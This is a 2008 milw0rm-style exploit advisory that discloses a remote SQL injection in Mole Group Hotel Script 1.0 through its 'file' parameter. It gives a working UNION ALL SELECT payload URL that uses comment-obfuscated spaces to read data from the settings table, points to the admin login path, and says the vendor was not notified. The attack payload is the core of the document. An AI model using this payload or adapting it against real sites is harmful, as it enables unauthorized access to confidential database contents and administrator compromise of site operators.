55 lines
No EOL
1.3 KiB
Text
55 lines
No EOL
1.3 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 8 JULY 2008
|
|
[*] Script Download: http://www.mole-group.com/content/view/44/59/
|
|
[*] DORK: N/A
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
Mole Group Hotel Script suffers from a insecure mysql query in the "file" variable.
|
|
This can lead to malicous users arbitrary selecting confidential information from the database.
|
|
|
|
See below for the SQL injection.
|
|
|
|
|
|
|
|
[*] SQL Injection:
|
|
|
|
http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
admin login is at /admin/
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
|
|
|
|
|
|
|
|
[-] Peace...
|
|
|
|
...t0pP8uZz !
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-07-08] |